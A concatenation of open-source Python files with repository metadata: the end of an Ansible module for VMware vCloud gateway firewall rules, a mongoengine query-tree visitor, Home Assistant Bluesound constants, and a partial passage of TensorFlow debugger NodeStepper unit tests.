module.fail_json(msg="the value in protocol is not valid, valid values are as above", valid_proto=VALID_PROTO)
return fw_rules
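# Illustrative example (not part of the original module): an input rule of
# {'description': 'ssh in'} is normalized by validate_fw_rules() to
# {'description': 'ssh in', 'source_ip': 'Any', 'source_port': 'Any',
#  'dest_ip': 'Any', 'dest_port': 'Any', 'protocol': 'Any', 'policy': 'allow',
#  'is_enable': 'true', 'enable_logging': 'false'}.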
def create_protocol_list(protocol):
plist = []
    plist.append(protocol.get_Tcp())
    plist.append(protocol.get_Any())
plist.append(protocol.get_Udp())
plist.append(protocol.get_Icmp())
plist.append(protocol.get_Other())
return plist
def create_protocols_type(protocol):
all_protocols = {"Tcp": None, "Udp": None, "Icmp": None, "Any": None}
all_protocols[protocol] = True
return ProtocolsType(**all_protocols)
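# For example, create_protocols_type('Tcp') builds a ProtocolsType with only
# the Tcp flag set, i.e. ProtocolsType(Tcp=True, Udp=None, Icmp=None, Any=None).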
def main():
module = AnsibleModule(
argument_spec=dict(
username = dict(default=None),
password = dict(default=None),
org = dict(default=None),
service_id = dict(default=None),
instance_id = dict(default=None),
host = dict(default=None),
api_version = dict(default='5.7'),
service_type = dict(default='vca', choices=['vchs', 'vca', 'vcd']),
state = dict(default='present', choices = ['present', 'absent']),
vdc_name = dict(default=None),
gateway_name = dict(default='gateway'),
            fw_rules = dict(required=True, default=None, type='list'),
            verify_certs = dict(default=True, type='bool'),
)
)
vdc_name = module.params.get('vdc_name')
org = module.params.get('org')
service = module.params.get('service_id')
state = module.params.get('state')
service_type = module.params.get('service_type')
host = module.params.get('host')
instance_id = module.params.get('instance_id')
fw_rules = module.params.get('fw_rules')
gateway_name = module.params.get('gateway_name')
    verify_certs = module.params.get('verify_certs')
if not HAS_PYVCLOUD:
module.fail_json(msg="python module pyvcloud is needed for this module")
if service_type == 'vca':
if not instance_id:
module.fail_json(msg="When service type is vca the instance_id parameter is mandatory")
if not vdc_name:
module.fail_json(msg="When service type is vca the vdc_name parameter is mandatory")
if service_type == 'vchs':
if not service:
module.fail_json(msg="When service type vchs the service_id parameter is mandatory")
if not org:
org = service
if not vdc_name:
vdc_name = service
if service_type == 'vcd':
if not host:
module.fail_json(msg="When service type is vcd host parameter is mandatory")
vca = vca_login(module)
vdc = vca.get_vdc(vdc_name)
if not vdc:
module.fail_json(msg = "Error getting the vdc, Please check the vdc name")
mod_rules = validate_fw_rules(module, fw_rules)
gateway = vca.get_gateway(vdc_name, gateway_name)
if not gateway:
module.fail_json(msg="Not able to find the gateway %s, please check the gateway_name param" %gateway_name)
rules = gateway.get_fw_rules()
existing_rules = []
del_rules = []
for rule in rules:
current_trait = (create_protocol_list(rule.get_Protocols()),
rule.get_DestinationPortRange(),
rule.get_DestinationIp(),
rule.get_SourcePortRange(),
rule.get_SourceIp())
for idx, val in enumerate(mod_rules):
trait = (create_protocol_list(create_protocols_type(val['protocol'])),
val['dest_port'], val['dest_ip'], val['source_port'], val['source_ip'])
if current_trait == trait:
del_rules.append(mod_rules[idx])
mod_rules.pop(idx)
existing_rules.append(current_trait)
if state == 'absent':
if len(del_rules) < 1:
module.exit_json(changed=False, msg="Nothing to delete", delete_rules=mod_rules)
else:
for i in del_rules:
gateway.delete_fw_rule(i['protocol'], i['dest_port'], i['dest_ip'], i['source_port'], i['source_ip'])
task = gateway.save_services_configuration()
if not task:
module.fail_json(msg="Unable to Delete Rule, please check above error", error=gateway.response.content)
if not vca.block_until_completed(task):
module.fail_json(msg="Error while waiting to remove Rule, please check above error", error=gateway.response.content)
module.exit_json(changed=True, msg="Rules Deleted", deleted_rules=del_rules)
if len(mod_rules) < 1:
module.exit_json(changed=False, rules=existing_rules)
if len(mod_rules) >= 1:
for i in mod_rules:
gateway.add_fw_rule(i['is_enable'], i['description'], i['policy'], i['protocol'], i['dest_port'], i['dest_ip'],
i['source_port'], i['source_ip'], i['enable_logging'])
task = gateway.save_services_configuration()
if not task:
module.fail_json(msg="Unable to Add Rule, please check above error", error=gateway.response.content)
if not vca.block_until_completed(task):
module.fail_json(msg="Failure in waiting for adding firewall rule", error=gateway.response.content)
module.exit_json(changed=True, rules=mod_rules)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| muffl0n/ansible-modules-extras | cloud/vmware/vca_fw.py | Python | gpl-3.0 | 14,207 |
import copy
from mongoengine.errors import InvalidQueryError
from mongoengine.queryset import transform
__all__ = ('Q',)
class QNodeVisitor(object):
"""Base visitor class for visiting Q-object nodes in a query tree.
"""
def visit_combination(self, combination):
"""Called by QCombination objects.
"""
return combination
def visit_query(self, query):
"""Called by (New)Q objects.
"""
return query
class DuplicateQueryConditionsError(InvalidQueryError):
pass
class SimplificationVisitor(QNodeVisitor):
"""Simplifies query trees by combining unnecessary 'and' connection nodes
into a single Q-object.
"""
def visit_combination(self, combination):
if combination.operation == combination.AND:
# The simplification only applies to 'simple' queries
if all(isinstance(node, Q) for node in combination.children):
queries = [n.query for n in combination.children]
try:
return Q(**self._query_conjunction(queries))
except DuplicateQueryConditionsError:
# Cannot be simplified
pass
return combination
def _query_conjunction(self, queries):
"""Merges query dicts - effectively &ing them together.
"""
query_ops = set()
combined_query = {}
for query in queries:
ops = set(query.keys())
# Make sure that the same operation isn't applied more than once
# to a single field
intersection = ops.intersection(query_ops)
if intersection:
raise DuplicateQueryConditionsError()
query_ops.update(ops)
combined_query.update(copy.deepcopy(query))
return combined_query
class QueryCompilerVisitor(QNodeVisitor):
"""Compiles the nodes in a query tree to a PyMongo-compatible query
dictionary.
"""
def __init__(self, document):
self.document = document
def visit_combination(self, combination):
operator = "$and"
if combination.operation == combination.OR:
operator = "$or"
return {operator: combination.children}
def visit_query(self, query):
return transform.query(self.document, **query.query)
class QNode(object):
"""Base class for nodes in query trees.
"""
AND = 0
OR = 1
def to_query(self, document):
query = self.accept(SimplificationVisitor())
query = query.accept(QueryCompilerVisitor(document))
return query
def accept(self, visitor):
raise NotImplementedError
def _combine(self, other, operation):
"""Combine this node with another node into a QCombination object.
"""
if getattr(other, 'empty', True):
return self
if self.empty:
return other
return QCombination(operation, [self, other])
@property
def empty(self):
return False
def __or__(self, other):
return self._combine(other, self.OR)
def __and__(self, other):
return self._combine(other, self.AND)
class QCombination(QNode):
"""Represents the combination of several conditions by a given logical
operator.
"""
def __init__(self, operation, children):
self.operation = operation
self.children = []
for node in children:
# If the child is a combination of the same type, we can merge its
# children directly into this combinations children
if isinstance(node, QCombination) and node.operation == operation:
self.children += node.children
else:
self.children.append(node)
def accept(self, visitor):
for i in range(len(self.children)):
if isinstance(self.children[i], QNode):
self.children[i] = self.children[i].accept(visitor)
return visitor.visit_combination(self)
@property
def empty(self):
return not bool(self.children)
class Q(QNode):
"""A simple query object, used in a query tree to build up more complex
query structures.
"""
def __init__(self, **query):
self.query = query
def accept(self, visitor):
return visitor.visit_query(self)
@property
def empty(self):
return not bool(self.query)
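# Illustrative usage (assumes a Document subclass ``User`` with fields ``name``
# and ``age``; not part of the original module):
#
#     User.objects(Q(name="Ross") | Q(age__gte=30))
#
# The expression builds a QCombination tree that compiles to a PyMongo query
# such as {'$or': [{'name': 'Ross'}, {'age': {'$gte': 30}}]}.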
| elioth010/lugama | venv/lib/python2.7/site-packages/mongoengine/queryset/visitor.py | Python | gpl-2.0 | 4,434 |
"""Constants for the Bluesound HiFi wireless speakers and audio integrations component."""
DOMAIN = "bluesound"
SERVICE_CLEAR_TIMER = "clear_sleep_timer"
SERVICE_JOIN = "join"
SERVICE_SET_TIMER = "set_sleep_timer"
SERVICE_UNJOIN = "unjoin"
| nkgilley/home-assistant | homeassistant/components/bluesound/const.py | Python | apache-2.0 | 240 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests of the tfdbg Stepper."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.client import session
from tensorflow.python.debug.lib.stepper import NodeStepper
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import gradient_descent
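# These tests drive the stepper over small graphs; each cont() call evaluates
# one node, caching results as TensorFlow tensor handles so that later calls
# can feed them back instead of recomputing upstream nodes.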
class StepperTest(test_util.TensorFlowTestCase):
def setUp(self):
self.a = variables.Variable(2.0, name="a")
self.b = variables.Variable(3.0, name="b")
self.c = math_ops.multiply(self.a, self.b, name="c") # Should be 6.0.
self.d = math_ops.multiply(self.a, self.a, name="d") # Should be 4.0.
self.e = math_ops.multiply(self.d, self.c, name="e") # Should be 24.0.
self.f_y = constant_op.constant(0.30, name="f_y")
self.f = math_ops.div(self.b, self.f_y, name="f") # Should be 10.0.
    # The three nodes x, y and z form a graph with "cross-links" in it; i.e.,
    # x and y are both direct inputs to z, but x is also a direct input to y.
self.x = variables.Variable(2.0, name="x") # Should be 2.0
self.y = math_ops.negative(self.x, name="y") # Should be -2.0.
self.z = math_ops.multiply(self.x, self.y, name="z") # Should be -4.0.
self.sess = session.Session()
self.sess.run(variables.global_variables_initializer())
def tearDown(self):
ops.reset_default_graph()
def testContToFetchNotInTransitiveClosureShouldError(self):
with NodeStepper(self.sess, "e:0") as stepper:
sorted_nodes = stepper.sorted_nodes()
self.assertEqual(7, len(sorted_nodes))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("a/read"))
self.assertLess(sorted_nodes.index("b"), sorted_nodes.index("b/read"))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("c"))
self.assertLess(sorted_nodes.index("b"), sorted_nodes.index("c"))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("d"))
self.assertLess(sorted_nodes.index("d"), sorted_nodes.index("e"))
self.assertLess(sorted_nodes.index("c"), sorted_nodes.index("e"))
self.assertSetEqual(
{"e:0", "d:0", "c:0", "a/read:0", "b/read:0", "b:0", "a:0"},
set(stepper.closure_elements()))
with self.assertRaisesRegexp(
ValueError,
"Target \"f:0\" is not in the transitive closure for the fetch of "
"the stepper"):
stepper.cont("f:0")
def testContToNodeNameShouldReturnTensorValue(self):
with NodeStepper(self.sess, "e:0") as stepper:
self.assertAllClose(6.0, stepper.cont("c"))
def testUsingNamesNotUsingIntermediateTensors(self):
with NodeStepper(self.sess, "e:0") as stepper:
# The first cont() call should have used no feeds.
result = stepper.cont("c:0")
self.assertAllClose(6.0, result)
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertEqual({}, stepper.last_feed_types())
# The second cont() call should have used the tensor handle from the
# previous cont() call.
result = stepper.cont("e:0")
self.assertAllClose(24.0, result)
self.assertItemsEqual(["a/read:0", "b/read:0", "d:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertAllClose(4.0, stepper.get_tensor_value("d:0"))
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_HANDLE,
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
def testUsingNodesNotUsingIntermediateTensors(self):
with NodeStepper(self.sess, self.e) as stepper:
# There should be no handles before any cont() calls.
self.assertEqual([], stepper.handle_names())
self.assertSetEqual(set(), stepper.handle_node_names())
# Before the cont() call, the stepper should not have access to the value
# of c:0.
with self.assertRaisesRegexp(
ValueError,
"This stepper instance does not have access to the value of tensor "
"\"c:0\""):
stepper.get_tensor_value("c:0")
# Using the node/tensor itself, instead of the name str, should work on
# cont().
result = stepper.cont(self.c)
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(6.0, result)
self.assertEqual({}, stepper.last_feed_types())
self.assertEqual(["c:0"], stepper.handle_names())
self.assertEqual({"c"}, stepper.handle_node_names())
# After the cont() call, the stepper should have access to the value of
# c:0 via a tensor handle.
self.assertAllClose(6.0, stepper.get_tensor_value("c:0"))
result = stepper.cont(self.e)
self.assertAllClose(24.0, result)
self.assertItemsEqual(["a/read:0", "b/read:0", "d:0"],
stepper.intermediate_tensor_names())
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_HANDLE,
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
def testContToTensorWithIntermediateDumpShouldUseDump(self):
with NodeStepper(self.sess, ["e:0", "f:0"]) as stepper:
stepper.cont("c:0")
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertAllClose(2.0, stepper.cont("a/read:0"))
self.assertEqual({
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE
}, stepper.last_feed_types())
self.assertAllClose(10.0, stepper.cont("f:0"))
self.assertEqual({
"b/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE
}, stepper.last_feed_types())
def testDisablingUseDumpedIntermediatesWorks(self):
with NodeStepper(self.sess, ["e:0", "f:0"]) as stepper:
stepper.cont("c:0")
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertAllClose(10.0,
stepper.cont("f:0", use_dumped_intermediates=False))
self.assertEqual({}, stepper.last_feed_types())
def testIsFeedableShouldGiveCorrectAnswers(self):
with NodeStepper(self.sess, self.e) as stepper:
self.assertTrue(stepper.is_feedable("a/read:0"))
self.assertTrue(stepper.is_feedable("b/read:0"))
self.assertTrue(stepper.is_feedable("c:0"))
self.assertTrue(stepper.is_feedable("d:0"))
def testOverrideValue(self):
with NodeStepper(self.sess, self.e) as stepper:
result = stepper.cont(self.c)
self.assertAllClose(6.0, result)
self.assertEqual({}, stepper.last_feed_types())
# There should be no overrides before any cont() calls.
self.assertEqual([], stepper.override_names())
# Calling cont() on c again should lead to use of the handle.
result = stepper.cont(self.c)
self.assertAllClose(6.0, result)
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_HANDLE
}, stepper.last_feed_types())
# Override c:0.
stepper.override_tensor("c:0", 7.0)
# After the overriding, calling get_tensor_value() on c:0 should yield the
# overriding value.
self.assertEqual(7.0, stepper.get_tensor_value("c:0"))
# Now c:0 should have only an override value, but no cached handle,
# because the handle should have been invalidated.
self.assertEqual([], stepper.handle_names())
self.assertSetEqual(set(), stepper.handle_node_names())
self.assertEqual(["c:0"], stepper.override_names())
# Run a downstream tensor after the value override.
result = stepper.cont(self.e)
self.assertAllClose(28.0, result) # Should reflect the overriding value.
# Should use override, instead of the handle.
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_OVERRIDE,
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
def testOverrideValueTwice(self):
with NodeStepper(self.sess, self.e) as stepper:
# Override once.
stepper.override_tensor("c:0", 7.0)
self.assertAllClose(28.0, stepper.cont(self.e))
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_OVERRIDE
}, stepper.last_feed_types())
self.assertEqual(["e:0"], stepper.handle_names())
self.assertSetEqual({"e"}, stepper.handle_node_names())
self.assertEqual(["c:0"], stepper.override_names())
# Calling cont(self.e) again. This time the cached tensor handle of e
# should be used.
self.assertEqual(28.0, stepper.cont(self.e))
self.assertEqual({
"e:0": NodeStepper.FEED_TYPE_HANDLE
}, stepper.last_feed_types())
# Override c again. This should have invalidated the cache for e.
stepper.override_tensor("c:0", 8.0)
self.assertEqual([], stepper.handle_names())
self.assertEqual(set(), stepper.handle_node_names())
self.assertEqual(["c:0"], stepper.override_names())
self.assertAllClose(32.0, stepper.cont(self.e))
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_OVERRIDE,
"d:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
def testRemoveOverrideValue(self):
with NodeStepper(self.sess, self.e) as stepper:
result = stepper.cont(self.c)
self.assertAllClose(6.0, result)
self.assertEqual({}, stepper.last_feed_types())
# The previous cont() step should have generated a cached tensor handle.
self.assertEqual(["c:0"], stepper.handle_names())
self.assertSetEqual({"c"}, stepper.handle_node_names())
# Override c:0.
stepper.override_tensor("c:0", 7.0)
# The overriding should have invalidated the tensor handle.
self.assertEqual([], stepper.handle_names())
self.assertSetEqual(set(), stepper.handle_node_names())
self.assertEqual(["c:0"], stepper.override_names())
result = stepper.cont(self.e)
self.assertAllClose(28.0, result) # Should reflect the overriding value.
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_OVERRIDE,
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
# The handle to tensor e:0 should have been cached, even though its
# transitive closure contains an override.
self.assertIn("e:0", stepper.handle_names())
self.assertSetEqual({"e"}, stepper.handle_node_names())
# Remove the override.
stepper.remove_override("c:0")
# c:0 should not be in the overrides anymore.
self.assertEqual([], stepper.override_names())
# Removing the override should have invalidated the tensor handle for c.
self.assertNotIn("e:0", stepper.handle_names())
self.assertNotIn("e", stepper.handle_node_names())
# Should reflect the non-overriding value.
self.assertAllClose(24.0, stepper.cont(self.e))
# This time, the handle to tensor e:0 should have been cached again, even
# thought its transitive closure contains an override.
self.assertIn("e:0", stepper.handle_names())
self.assertIn("e", stepper.handle_node_names())
# Calling cont(self.e) again should have used the tensor handle to e:0.
self.assertAllClose(24.0, stepper.cont(self.e))
self.assertEqual({
"e:0": NodeStepper.FEED_TYPE_HANDLE,
}, stepper.last_feed_types())
def testOverrideAndContToSameTensor(self):
with NodeStepper(self.sess, self.e) as stepper:
result = stepper.cont(self.c)
self.assertAllClose(6.0, result)
self.assertEqual({}, stepper.last_feed_types())
self.assertEqual(["c:0"], stepper.handle_names())
self.assertSetEqual({"c"}, stepper.handle_node_names())
self.assertAllClose(6.0, stepper.cont(self.c))
# The last cont() call should use the tensor handle directly.
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_HANDLE
}, stepper.last_feed_types())
# Override c:0.
stepper.override_tensor("c:0", 7.0)
# As a result of the override, the tensor handle should have been
# invalidated.
self.assertEqual([], stepper.handle_names())
self.assertSetEqual(set(), stepper.handle_node_names())
result = stepper.cont(self.c)
self.assertAllClose(7.0, result)
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_OVERRIDE
}, stepper.last_feed_types())
def testFinalizeWithPreviousOverrides(self):
with NodeStepper(self.sess, self.e) as stepper:
stepper.override_tensor("a/read:0", 20.0)
self.assertEqual(["a/read:0"], stepper.override_names())
# Should reflect the overriding value.
self.assertAllClose(24000.0, stepper.cont("e:0"))
self.assertEqual({
"a/read:0": NodeStepper.FEED_TYPE_OVERRIDE
}, stepper.last_feed_types())
# Finalize call should have ignored the overriding value.
self.assertAllClose(24.0, stepper.finalize())
def testRemoveNonexistentOverrideValue(self):
with NodeStepper(self.sess, self.e) as stepper:
self.assertEqual([], stepper.override_names())
with self.assertRaisesRegexp(
ValueError, "No overriding value exists for tensor \"c:0\""):
stepper.remove_override("c:0")
def testAttemptToOverrideInvalidTensor(self):
stepper = NodeStepper(self.sess, self.e)
with self.assertRaisesRegexp(ValueError, "Cannot override tensor \"f:0\""):
stepper.override_tensor("f:0", 42.0)
def testInvalidOverrideArgumentType(self):
with NodeStepper(self.sess, self.e) as stepper:
with self.assertRaisesRegexp(TypeError, "Expected type str; got type"):
stepper.override_tensor(self.a, 42.0)
def testTransitiveClosureWithCrossLinksShouldHaveCorrectOrder(self):
with NodeStepper(self.sess, "z:0") as stepper:
sorted_nodes = stepper.sorted_nodes()
self.assertEqual(4, len(sorted_nodes))
self.assertLess(sorted_nodes.index("x"), sorted_nodes.index("x/read"))
self.assertLess(sorted_nodes.index("x"), sorted_nodes.index("y"))
self.assertLess(sorted_nodes.index("x"), sorted_nodes.index("z"))
self.assertLess(sorted_nodes.index("y"), sorted_nodes.index("z"))
def testNodeStepperConstructorShouldAllowListOrTupleOrDictOfFetches(self):
for i in range(6):
if i == 0:
fetches = [self.e, [self.f, self.z]]
elif i == 1:
fetches = (self.e, (self.f, self.z))
elif i == 2:
fetches = {"e": self.e, "fz": {"f": self.f, "z": self.z}}
elif i == 3:
fetches = ["e:0", ["f:0", "z:0"]]
elif i == 4:
fetches = ("e:0", ("f:0", "z:0"))
elif i == 5:
fetches = {"e": "e:0", "fz": {"f": "f:0", "z": "z:0"}}
with NodeStepper(self.sess, fetches) as stepper:
sorted_nodes = stepper.sorted_nodes()
self.assertEqual(13, len(sorted_nodes))
# Check the topological order of the sorted nodes.
self.assertLess(sorted_nodes.index("x"), sorted_nodes.index("x/read"))
self.assertLess(sorted_nodes.index("x"), sorted_nodes.index("y"))
self.assertLess(sorted_nodes.index("x"), sorted_nodes.index("z"))
self.assertLess(sorted_nodes.index("y"), sorted_nodes.index("z"))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("a/read"))
self.assertLess(sorted_nodes.index("b"), sorted_nodes.index("b/read"))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("c"))
self.assertLess(sorted_nodes.index("b"), sorted_nodes.index("c"))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("d"))
self.assertLess(sorted_nodes.index("d"), sorted_nodes.index("e"))
self.assertLess(sorted_nodes.index("c"), sorted_nodes.index("e"))
self.assertLess(sorted_nodes.index("b"), sorted_nodes.index("f"))
self.assertLess(sorted_nodes.index("f_y"), sorted_nodes.index("f"))
closure_elements = stepper.closure_elements()
self.assertIn("x/read:0", closure_elements)
self.assertIn("e:0", closure_elements)
self.assertIn("f:0", closure_elements)
self.assertEqual([0], stepper.output_slots_in_closure("x/read"))
self.assertEqual([0], stepper.output_slots_in_closure("e"))
self.assertEqual([0], stepper.output_slots_in_closure("f"))
result = stepper.finalize()
if i == 0 or i == 1 or i == 3 or i == 4:
self.assertAllClose(24.0, result[0])
self.assertAllClose(10.0, result[1][0])
self.assertAllClose(-4.0, result[1][1])
elif i == 2 or i == 5:
self.assertAllClose(24.0, result["e"])
self.assertAllClose(10.0, result["fz"]["f"])
self.assertAllClose(-4.0, result["fz"]["z"])
class StepperTestWithPlaceHolders(test_util.TensorFlowTestCase):
def setUp(self):
self.ph0 = array_ops.placeholder(dtypes.float32, shape=(2, 2), name="ph0")
self.ph1 = array_ops.placeholder(dtypes.float32, shape=(2, 1), name="ph1")
self.x = math_ops.matmul(self.ph0, self.ph1, name="x")
self.y = math_ops.add(self.x, self.ph1, name="y")
self.sess = session.Session()
def tearDown(self):
ops.reset_default_graph()
def testGetTensorValueWorksOnPlaceholder(self):
with NodeStepper(
self.sess,
self.y,
feed_dict={
self.ph0: [[1.0, 2.0], [-3.0, 5.0]],
self.ph1: [[-1.0], [0.5]]
}) as stepper:
self.assertAllClose([[1.0, 2.0], [-3.0, 5.0]],
stepper.get_tensor_value("ph0"))
self.assertAllClose([[1.0, 2.0], [-3.0, 5.0]],
stepper.get_tensor_value("ph0:0"))
with self.assertRaisesRegexp(
KeyError,
r"The name 'ph0:1' refers to a Tensor which does not exist"):
stepper.get_tensor_value("ph0:1")
def testIsPlaceholdersShouldGiveCorrectAnswers(self):
with NodeStepper(self.sess, self.y) as stepper:
self.assertTrue(stepper.is_placeholder(self.ph0.name))
self.assertTrue(stepper.is_placeholder(self.ph1.name))
self.assertFalse(stepper.is_placeholder(self.x.name))
self.assertFalse(stepper.is_placeholder(self.y.name))
with self.assertRaisesRegexp(ValueError,
"A is not in the transitive closure"):
self.assertFalse(stepper.is_placeholder("A"))
def testPlaceholdersShouldGiveCorrectAnswers(self):
with NodeStepper(self.sess, self.y) as stepper:
self.assertSetEqual({"ph0", "ph1"}, set(stepper.placeholders()))
def testContWithPlaceholders(self):
with NodeStepper(
self.sess,
self.y,
feed_dict={
self.ph0: [[1.0, 2.0], [-3.0, 5.0]],
self.ph1: [[-1.0], [0.5]]
}) as stepper:
self.assertEqual(4, len(stepper.sorted_nodes()))
self.assertSetEqual({"ph0:0", "ph1:0", "x:0", "y:0"},
set(stepper.closure_elements()))
result = stepper.cont(self.x)
self.assertAllClose([[0.0], [5.5]], result)
self.assertEqual({
"ph0:0": NodeStepper.FEED_TYPE_CLIENT,
"ph1:0": NodeStepper.FEED_TYPE_CLIENT,
}, stepper.last_feed_types())
self.assertEqual(["x:0"], stepper.handle_names())
self.assertSetEqual({"x"}, stepper.handle_node_names())
result = stepper.cont(self.y)
self.assertAllClose([[-1.0], [6.0]], result)
self.assertEqual({
"x:0": NodeStepper.FEED_TYPE_HANDLE,
"ph1:0": NodeStepper.FEED_TYPE_CLIENT,
}, stepper.last_feed_types())
def testAttemptToContToPlaceholderWithTensorFeedKeysShouldWork(self):
"""Continuing to a placeholder should be allowed, using client feed."""
ph0_feed = [[1.0, 2.0], [-3.0, 5.0]]
ph1_feed = [[-1.0], [0.5]]
with NodeStepper(
self.sess, self.y, feed_dict={
self.ph0: ph0_feed,
self.ph1: ph1_feed,
}) as stepper:
self.assertAllClose(ph0_feed, stepper.cont(self.ph0))
self.assertEqual({
self.ph0.name: NodeStepper.FEED_TYPE_CLIENT
}, stepper.last_feed_types())
self.assertAllClose(ph1_feed, stepper.cont(self.ph1))
self.assertEqual({
self.ph1.name: NodeStepper.FEED_TYPE_CLIENT
}, stepper.last_feed_types())
ph0_node = self.sess.graph.as_graph_element("ph0")
self.assertAllClose(ph0_feed, stepper.cont(ph0_node))
self.assertEqual({
self.ph0.name: NodeStepper.FEED_TYPE_CLIENT
}, stepper.last_feed_types())
self.assertAllClose([[-1.0], [6.0]], stepper.finalize())
def testAttemptToContToPlaceholderWithTensorNameFeedKeysShouldWork(self):
ph0_feed = [[1.0, 2.0], [-3.0, 5.0]]
ph1_feed = [[-1.0], [0.5]]
with NodeStepper(
self.sess,
self.y,
feed_dict={
self.ph0.name: ph0_feed,
self.ph1.name: ph1_feed,
}) as stepper:
self.assertAllClose(ph0_feed, stepper.cont(self.ph0))
self.assertEqual({
self.ph0.name: NodeStepper.FEED_TYPE_CLIENT
}, stepper.last_feed_types())
self.assertAllClose(ph1_feed, stepper.cont(self.ph1))
self.assertEqual({
self.ph1.name: NodeStepper.FEED_TYPE_CLIENT
}, stepper.last_feed_types())
ph0_node = self.sess.graph.as_graph_element("ph0")
self.assertAllClose(ph0_feed, stepper.cont(ph0_node))
self.assertEqual({
self.ph0.name: NodeStepper.FEED_TYPE_CLIENT
}, stepper.last_feed_types())
self.assertAllClose([[-1.0], [6.0]], stepper.finalize())
class StepperAssignAddTest(test_util.TensorFlowTestCase):
def setUp(self):
self.v = variables.Variable(10.0, name="v")
self.p = math_ops.add(self.v, self.v, name="p")
self.q = math_ops.multiply(self.p, self.p, name="q")
self.delta = constant_op.constant(2.0, name="delta")
self.v_add = state_ops.assign_add(self.v, self.delta, name="v_add")
self.v_add_plus_one = math_ops.add(self.v_add,
1.0,
name="v_add_plus_one")
self.sess = session.Session()
self.sess.run(self.v.initializer)
def tearDown(self):
ops.reset_default_graph()
def testLastUpdatedVariablesReturnsNoneBeforeAnyContCalls(self):
with NodeStepper(self.sess, [self.q, self.v_add]) as stepper:
self.assertIsNone(stepper.last_updated())
  def testContToUpdateInvalidatesDumpedIntermediates(self):
with NodeStepper(self.sess, [self.q, self.v_add]) as stepper:
self.assertAllClose(400.0, stepper.cont("q:0"))
self.assertItemsEqual(["v/read:0", "p:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(10.0, stepper.get_tensor_value("v/read:0"))
self.assertAllClose(20.0, stepper.get_tensor_value("p:0"))
self.assertAllClose(
12.0, stepper.cont(
self.v_add, invalidate_from_updated_variables=True))
self.assertAllClose(12.0, self.sess.run(self.v))
self.assertSetEqual({self.v.name}, stepper.last_updated())
self.assertItemsEqual(["v:0"], stepper.dirty_variables())
# Updating the value of v by calling v_add should have invalidated the
# dumped intermediate tensors for v/read:0 and p:0.
self.assertItemsEqual(["delta:0"], stepper.intermediate_tensor_names())
with self.assertRaisesRegexp(
ValueError,
r"This stepper instance does not have access to the value of tensor "
r"\"p:0\""):
stepper.get_tensor_value("p:0")
# The next cont to q should not have used any dumped intermediate tensors
# and its result should reflect the updated value.
self.assertAllClose(576.0, stepper.cont("q:0"))
self.assertSetEqual(set(), stepper.last_updated())
self.assertEqual({}, stepper.last_feed_types())
def testOverridingUpstreamTensorInvalidatesDumpedIntermediates(self):
with NodeStepper(self.sess, self.q) as stepper:
self.assertAllClose(400.0, stepper.cont("q:0"))
self.assertItemsEqual(["v/read:0", "p:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(10.0, stepper.get_tensor_value("v/read:0"))
self.assertAllClose(20.0, stepper.get_tensor_value("p:0"))
stepper.override_tensor("v/read:0", 11.0)
self.assertItemsEqual(["v/read:0"], stepper.override_names())
# Overriding the upstream v/read:0 should have invalidated the dumped
# intermediate tensor for the downstream p:0.
self.assertItemsEqual([], stepper.intermediate_tensor_names())
# The next cont to q should not have used any dumped intermediate tensors
